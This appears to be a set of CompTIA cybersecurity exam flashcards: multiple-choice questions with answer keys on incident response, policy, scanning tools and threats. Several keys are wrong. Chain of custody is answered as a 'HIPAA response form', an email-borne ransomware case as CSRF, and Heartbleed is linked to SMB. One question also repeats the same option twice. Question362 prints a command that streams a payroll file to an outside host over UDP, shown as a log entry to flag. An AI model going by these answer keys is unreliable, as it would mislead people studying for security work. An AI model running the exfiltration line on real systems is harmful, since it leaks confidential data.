Comptia Exam Test Flashcards

1
Q

Question312
Joe, a user, is unable to launch an application on his laptop, which he typically uses on a daily basis. Joe informs a security analyst of the issue. After an online database comparison, the security analyst checks the SIEM and notices alerts indicating certain .txt and .dll files are blocked. Which of the following tools would generate these logs?

A. Antivirus
B. HIPS
C. Firewall
D. Proxy

A

C. Firewall

2
Q

Question313
Employees at a manufacturing plant have been victims of spear phishing, but security solutions prevented further intrusions into the network. Which of the following is the MOST appropriate solution in this scenario?

A. Continue to monitor security devices
B. Update antivirus and malware definitions
C. Provide security awareness training
D. Migrate email services to a hosted environment

A

C. Provide security awareness training

3
Q

Question314
A new security manager was hired to establish a vulnerability management program. The manager asked for a corporate strategic plan and risk register that the project management office developed. The manager conducted tools and skillsets inventory to document the plan. Which of the following is a critical task for the establishment of a successful program?

A. Establish continuous monitoring
B. Update vulnerability feed
C. Perform information classification
D. Establish corporate policy

A

D. Establish corporate policy

4
Q

Question317
An analyst suspects a large database that contains customer information and credit card data was exfiltrated to a known hacker group in a foreign country. Which of the following incident response steps should the analyst take FIRST?

A. Immediately notify law enforcement, as they may be able to help track down the hacker group before customer information is disseminated.
B. Draft and publish a notice on the company’s website about the incident, as PCI regulations require immediate disclosure in the case of a breach of PII or card data.
C. Isolate the server, restore the database to a time before the vulnerability occurred, and ensure the database is encrypted.
D. Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

A

D. Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

5
Q

Question319
A suite of three production servers that were originally configured identically underwent the same vulnerability scans. However, recent results revealed the three servers have different critical vulnerabilities. The servers are not accessible by the Internet, and AV programs have not detected any malware. The server’s syslog files do not show any unusual traffic since they were installed and are physically isolated in an off-site datacenter. Checksum testing of random executables does not reveal tampering. Which of the following scenarios is MOST likely?

A. Servers have not been scanned with the latest vulnerability signature
B. Servers have been attacked by outsiders using zero-day vulnerabilities
C. Servers were made by different manufacturers
D. Servers have received different levels of attention during previous patch management events

A

D. Servers have received different levels of attention during previous patch management events

6
Q

Question320
Malicious users utilized brute force to access a system. An analyst is investigating these attacks and recommends methods to management that would help secure the system. Which of the following controls should the analyst recommend? (Choose three.)

A. Multifactor authentication
B. Network segmentation
C. Single sign-on
D. Encryption
E. Complexity policy
F. Biometrics
G. Obfuscation

A

A. Multifactor authentication
E. Complexity policy
F. Biometrics

7
Q

Question322
A cyber-incident response team is responding to a network intrusion incident on a hospital network. Which of the following must the team prepare to allow the data to be used in court as evidence?

A. Computer forensics form
B. HIPAA response form
C. Chain of custody form
D. Incident form

A

B. HIPAA response form

8
Q

Question325
A user received an invalid password response when trying to change the password. Which of the following policies could explain why the password is invalid?

A. Access control policy
B. Account management policy
C. Password policy
D. Data ownership policy

A

C. Password policy

9
Q

Question332
Which of the following command-line utilities would an analyst use on an end-user PC to determine the ports it is listening on?

A. tracert
B. ping
C. nslookup
D. netstat

A

D. netstat

10
Q

Question334
During a quarterly review of user accounts and activity, a security analyst noticed that after a password reset the head of human resources has been logging in from multiple locations, including several overseas. Further review of the account showed access rights to a number of corporate applications, including a sensitive accounting application used for employee bonuses. Which of the following security methods could be used to mitigate this risk?

A. RADIUS identity management
B. Context-based authentication
C. Privilege escalation restrictions
D. Elimination of self-service password resets

A

B. Context-based authentication

11
Q

Question335
The human resources division is moving all of its applications to an IaaS cloud. The Chief Information Officer (CIO) has asked the security architect to design the environment securely to prevent the IaaS provider from accessing its data-at-rest and data-in-transit within the infrastructure. Which of the following security controls should the security architect recommend?

A. Implement a non-data breach agreement
B. Ensure all backups are remote outside the control of the IaaS provider
C. Ensure all of the IaaS provider's workforce passes stringent background checks
D. Render data unreadable through the use of appropriate tools and techniques

A

D. Render data unreadable through the use of appropriate tools and techniques

12
Q

Question336
An organization has two environments: development and production. Development is where applications are developed with unit testing. The development environment has many configuration differences from the production environment. All applications are hosted on virtual machines. Vulnerability scans are performed against all systems before and after any application or configuration changes to any environment. Lately, vulnerability remediation activity has caused production applications to crash and behave unpredictably. Which of the following changes should be made to the current vulnerability management process?

A. Create a third environment between development and production that mirrors production and tests all changes before deployment to the users
B. Refine testing in the development environment to include fuzzing and user acceptance testing so applications are more stable before they migrate to production
C. Create a second production environment by cloning the virtual machines, and if any stability problems occur, migrate users to the alternate production environment
D. Refine testing in the production environment to include more exhaustive application stability testing while continuing to maintain the robust vulnerability remediation activities

A

A. Create a third environment between development and production that mirrors production and tests all changes before deployment to the users

13
Q

Question338
A threat intelligence analyst who is working on the SOC floor has been forwarded an email that was sent to one of the executives in business development. The executive mentions the email was from the Chief Executive Officer (CEO), who was requesting an emergency wire transfer. This request was unprecedented. Which of the following threats MOST accurately aligns with this behavior?

A. Phishing
B. Whaling
C. Spam
D. Ransomware

A

B. Whaling

14
Q

Question339
When reviewing the system logs, the cybersecurity analyst noticed a suspicious log entry:
wmic /node: HRDepartment1 computersystem get username
Which of the following combinations describes what occurred, and what action should be taken in this situation?

A. A rogue user has queried for users logged in remotely. Disable local access to network shares.
B. A rogue user has queried for the administrator logged into the system. Attempt to determine who executed the command.
C. A rogue user has queried for the administrator logged into the system. Disable local access to use cmd prompt.
D. A rogue user has queried for users logged in remotely. Attempt to determine who executed the command.

A

D. A rogue user has queried for users logged in remotely. Attempt to determine who executed the command.

15
Q

Question340
The security team has determined that the current incident response resources cannot meet management's objective to secure a forensic image for all serious security incidents within 24 hours. Which of the following compensating controls can be used to help meet management's expectations?

A. Separation of duties
B. Scheduled reviews
C. Dual control
D. Outsourcing

A

D. Outsourcing

16
Q

Question341
Which of the following describes why it is important for an organization’s incident response team and legal department to meet and discuss communication processes during the incident response process?

A. To comply with existing organizational policies and procedures on interacting with internal and external parties
B. To ensure all parties know their roles and effective lines of communication are established
C. To identify which group will communicate details to law enforcement in the event of a security incident
D. To predetermine what details should or should not be shared with internal or external parties in the event of an incident

A

A. To comply with existing organizational policies and procedures on interacting with internal and external parties

17
Q

Question344
The Chief Information Security Officer (CISO) has decided that all accounts with elevated privileges must use a longer, more complicated passphrase instead of a password. The CISO would like to formally document management’s intent to set this control level. Which of the following is the appropriate means to achieve this?

A. A control
B. A standard
C. A policy
D. A guideline

A

C. A policy

18
Q

Question345
During a physical penetration test at a client site, a local law enforcement officer stumbled upon the test and questioned the legitimacy of the team.
Which of the following information should be shown to the officer?

A. Letter of engagement
B. Scope of work
C. Timing information
D. Team reporting

A

A. Letter of engagement

19
Q

Question346
A security analyst is performing a stealth black-box audit of the local WiFi network and is running a wireless sniffer to capture local WiFi network traffic from a specific wireless access point. The SSID is not appearing in the sniffing logs of the local wireless network traffic. Which of the following is the best action that should be performed NEXT to determine the SSID?

A. Set up a fake wireless access point
B. Power down the wireless access point
C. Deauthorize users of that access point
D. Spoof the MAC addresses of adjacent access points

A

A. Set up a fake wireless access point

20
Q

Question347
An analyst is detecting Linux machines on a Windows network. Which of the following tools should be used to detect a computer operating system?

A. whois
B. netstat
C. nmap
D. nslookup

A

C. nmap

21
Q

Question348
A security analyst has performed various scans and found vulnerabilities in several applications that affect production data. Remediation of all exploits may cause certain applications to no longer work. Which of the following activities would need to be conducted BEFORE remediation?

A. Fuzzing
B. Input validation
C. Change control
D. Sandboxing

A

C. Change control

22
Q

Question349
A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usage, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, despite the fact that no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this?

A. Advanced persistent threat
B. Zero day
C. Trojan
D. Logic bomb

A

B. Zero day

23
Q

Question350
During a tabletop exercise, it is determined that a security analyst is required to ensure patching and scan reports are available during an incident, as well as documentation of all critical systems. To which of the following stakeholders should the analyst provide the reports?

A. Management
B. Affected vendors
C. Security operations
D. Legal

A

A. Management

24
Q

Question351
An employee was conducting research on the Internet when a message from cybercriminals appeared on the screen, stating the hard drive was just encrypted by a ransomware variant. An analyst observes the following:
- Antivirus signatures were updated recently
- The desktop background was changed
- Web proxy logs show browsing to various information security sites and ad network traffic
- There is a high volume of hard disk activity on the file server
- SMTP server showed the employee recently received several emails from blocked senders
- The company recently switched web hosting providers
- There are several IPS alerts for external port scans

Which of the following describes how the employee got this type of ransomware?

A. The employee fell victim to a CSRF attack
B. The employee was using other users' credentials
C. The employee opened an email attachment
D. The employee updated antivirus signatures

A

A. The employee fell victim to a CSRF attack

25
Q

Question353
An organization subscribes to multiple third-party security intelligence feeds. It receives a notification from one of these feeds indicating a zero-day malware attack is impacting the SQL server prior to SP 2. The notification also indicates that infected systems attempt to communicate to external IP addresses on port 2718 to download the additional payload. After consulting with the organization’s database administrator, it is determined that there are several SQL servers that are still on SP 1, and none of the SQL servers would normally communicate over port 2718. Which of the following is the BEST mitigation step to implement until the SQL servers can be upgraded to SP 2 with minimal impact on the network?

A. Create alert rules on the IDS for all outbound traffic on port 2718 from the IP addresses of the SQL servers running SQL SP 1
B. On the organization’s firewalls, create a new rule that blocks outbound traffic on port 2718 from the IP addresses of the servers running SQL SP 1
C. Place all the SQL servers running SP 1 on a separate subnet. On the firewalls, create a new rule blocking connections to destination addresses external to the organization's network
D. On the SQL servers running SP 1, install vulnerability scanning software

A

B. On the organization's firewalls, create a new rule that blocks outbound traffic on port 2718 from the IP addresses of the servers running SQL SP 1

26
Q

Question354
Which of the following is a vulnerability that is specific to hypervisors?

A. DDoS
B. VLAN hopping
C. Weak encryption
D. VM escape

A

D. VM escape

27
Q

Question355
An organization is performing vendor selection activities for penetration testing, and a security analyst is reviewing the MOA and rules of engagement, which were supplied with proposals. Which of the following should the analyst expect will be included in the documents and why?

A. The scope of the penetration test should be included in the MOA to ensure penetration testing is conducted against only specifically authorized network resources.
B. The MOA should address the client SLA in relation to reporting results to regulatory authorities, including issuing banks for organizations that process cardholder data.
C. The rules of engagement should include detailed results of the penetration scan, including all findings, as well as the designation of whether vulnerabilities identified during the scanning phases are found to be exploitable during the penetration test.
D. The exploitation standards should be addressed in the rules of engagement to ensure both parties are aware of the depth of exploitation that will be attempted by penetration testers.

A

C. The rules of engagement should include detailed results of the penetration scan, including all findings, as well as the designation of whether vulnerabilities identified during the scanning phases are found to be exploitable during the penetration test.

28
Q

Question356
A manufacturing company has decided to participate in direct sales of its products to consumers. The company decides to use a subdomain of its main site with its existing cloud service provider as the portal for e-commerce. After launch, the site is stable and functions properly, but after a robust day of sales, the site begins to redirect to competitors' landing pages. Which of the following actions should the company's security team take to determine the cause of the issue and minimize the scope of impact?

A. Engage a third party to provide penetration testing services to see if an exploit can be found
B. Check DNS records to ensure Cname or alias records are in place for the subdomain
C. Query the cloud provider to determine the nature of the DNS attack and find out which other clients are affected
D. Check the DNS records to ensure a correct MX record is established for the subdomain

A

B. Check DNS records to ensure Cname or alias records are in place for the subdomain

29
Q

Question357
An alert is issued from the SIEM that indicates a large number of failed logins for the same account name on one of the application servers starting at 10:20 a.m. No other significant failed login activity is detected. Using Splunk to search for activity pertaining to that account name, a security analyst finds the account has been authenticating successfully for some time and started to fail this morning. The account is attempting to authenticate from an internal server that is running a database to an application server. No other security activity is detected on the network. The analyst discovers the account owner is a developer who no longer works for the company. Which of the following is the MOST likely reason for the failed login attempts for that account?

A. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account
B. The host-based firewall is blocking port 389 LDAP communication, preventing the login credentials from being received by the application server
C. The license for the application has expired, and the failed logins will continue to occur until a new license key is installed on the application
D. A successful malware attack has provided someone access to the network, and failed login attempts are an indication of an attempt to privilege access to the application

A

A. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account

30
Q

Question359
A company requests a security assessment of its network. Permission is given, but no details are provided. It is discovered that the company has a web presence, and the company's IP address is 70.182.11.4. Which of the following Nmap commands would reveal common open ports and their versions?

A. nmap -oV
B. nmap -vO
C. nmap -sV

A

C. nmap -sV

31
Q

Question360
During a red team engagement, a penetration tester found a production server. Which of the following portions of the SOW should be referenced to see if the server should be part of the testing engagement?

A. Authorization
B. Exploitation
C. Communication
D. Scope

A

D. Scope

32
Q

Question361
The IT department at a growing law firm wants to begin using a third-party vendor for vulnerability monitoring and mitigation. The executive director of the law firm wishes to outline the assumptions and expectations between the two companies. Which of the following documents might be referenced in the event of a security breach at the law firm?

A. SLA
B. MOU
C. SOW
D. NDA

A

A. SLA

33
Q

Question362
A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

A. nmap -A -sV 192.168.1.235
B. cat payroll.csv > /dev/udp/123.456.123.456/53
C. cat /etc/passwd
D. mysql -h 192.168.1.235 -u test -p

A

B. cat payroll.csv > /dev/udp/123.456.123.456/53

34
Q

Question364
A company office was broken into over the weekend. The office manager contacts the IT security group to provide details on which servers were stolen. The security analyst determines one of the stolen servers contained a list of customer PII information, and another server contained a copy of the credit card transactions processed on the Friday before the break-in. In addition to potential security implications of information that could be gleaned from those servers and the rebuilding/restoring of the data on the stolen systems, the analyst needs to determine any communication or notification requirements with respect to the incident. Which of the following items is MOST important when determining what information needs to be provided, who should be contacted, and when the communication needs to occur?

A. Total number of records stolen
B. Government and industry regulations
C. Impact on the reputation of the company’s name/brand
D. The monetary value of data stolen

A

B. Government and industry regulations

35
Q

Question366
A security analyst at a large financial institution is evaluating the security posture of a smaller financial company. The analyst is performing the evaluation as part of a due diligence process prior to a potential acquisition. With which of the following threats should the security analyst be MOST concerned? (Choose two.)

A. Breach of confidentiality and market risks can occur if the potential acquisition is leaked to the press.
B. The parent company is only going through this process to identify and steal the intellectual property of the smaller company.
C. Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers.
D. Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers.
E. The industry regulator may decide that the acquisition will result in an unfair competitive advantage if the acquisition were to take place.
F. The company being acquired may already be compromised and this could pose a risk to the parent company’s assets.

A

E. The industry regulator may decide that the acquisition will result in an unfair competitive advantage if the acquisition were to take place.
F. The company being acquired may already be compromised and this could pose a risk to the parent company’s assets.

36
Q

Question369
A Chief Executive Officer (CEO) wants to implement BYOD in the environment. Which of the following options should the security analyst suggest to protect corporate data on these devices? (Choose two.)

A. Disable VPN connectivity on the device.
B. Disable Bluetooth on the device.
C. Disable near-field communication on the device.
D. Enable MDM/MAM capabilities.
E. Enable email services on the device.
F. Enable encryption on all devices.

A

D. Enable MDM/MAM capabilities.
F. Enable encryption on all devices.

37
Q

Question370
A security analyst positively identified the threat, vulnerability, and remediation. The analyst is ready to implement corrective control. Which of the following would be the MOST inhibiting to applying the fix?

A. Requiring a firewall reboot.
B. Resetting all administrator passwords.
C. Business process interruption.
D. Full desktop backups.

A

D. Full desktop backups.

38
Q

Question371
A security analyst is assisting in the redesign of a network to make it more secure. The solution should be low cost, and access to the secure segments should be easily monitored, secured, and controlled. Which of the following should be implemented?

A. System isolation
B. Honeypot
C. Jump box
D. Mandatory access control

A

C. Jump box

39
Q

Question372
A Chief Information Security Officer (CISO) needs to ensure that a laptop image remains unchanged and can be verified before authorizing the deployment of the image to 4000 laptops. Which of the following tools would be appropriate to use in this case?

A. MBSA
B. SHA1sum
C. FIM
D. DLP

A

B. SHA1sum

40
Q

Question373
Which of the following systems or services is MOST likely to exhibit issues stemming from the Heartbleed vulnerability? (Choose two.)

A. SSH daemons
B. Web servers
C. Modbus devices
D. TLS VPN services
E. IPSec VPN concentrators
F. SMB service

A

D. TLS VPN services
F. SMB service